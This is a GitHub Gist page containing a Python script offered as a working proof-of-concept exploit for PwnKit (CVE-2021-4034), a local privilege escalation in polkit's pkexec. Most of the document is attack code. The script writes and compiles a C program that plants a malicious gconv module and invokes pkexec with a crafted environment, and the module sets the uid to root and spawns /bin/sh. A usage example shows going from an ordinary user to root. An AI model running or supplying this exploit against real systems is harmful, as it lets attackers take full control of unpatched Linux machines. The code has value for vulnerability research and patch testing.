Last active
August 9, 2022 22:23
-
-
Save Ayoub-2/9f52583daec92ba2d81b4c4b4cbfe902 to your computer and use it in GitHub Desktop.
CVE-2021-4034 exploit in python
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/python | |
# Proof of Concept for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034) by aynkl | |
""" | |
CVE information: | |
- https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034 | |
Usage : | |
$ id | |
uid=1000(user) gid=1001(user) groups=1001(user) | |
$ python3 CVE-2021-4034.py | |
# whoami | |
root | |
""" | |
import os | |
shell = """ | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <unistd.h> | |
char *shell = | |
"#include <stdio.h>\\n" | |
"#include <stdlib.h>\\n" | |
"#include <unistd.h>\\n\\n" | |
"void gconv() {}\\n" | |
"void gconv_init() {\\n" | |
" setuid(0); setgid(0);\\n" | |
" seteuid(0); setegid(0);\\n" | |
" system(\\\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\\\");\\n" | |
" exit(0);\\n" | |
"}"; | |
int main(int argc, char *argv[]) { | |
FILE *fp; | |
system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'"); | |
system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules"); | |
fp = fopen("pwnkit/pwnkit.c", "w"); | |
fprintf(fp, "%s", shell); | |
fclose(fp); | |
system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC"); | |
char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL }; | |
execve("/usr/bin/pkexec", (char*[]){NULL}, env); | |
} | |
""" | |
if __name__ == "__main__" : | |
os.chdir("/tmp") | |
with open("cve.c" , "w") as fd : | |
fd.write(shell) | |
fd.close() | |
os.system("gcc cve.c -o cve.o && rm cve.c && ./cve.o ") | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment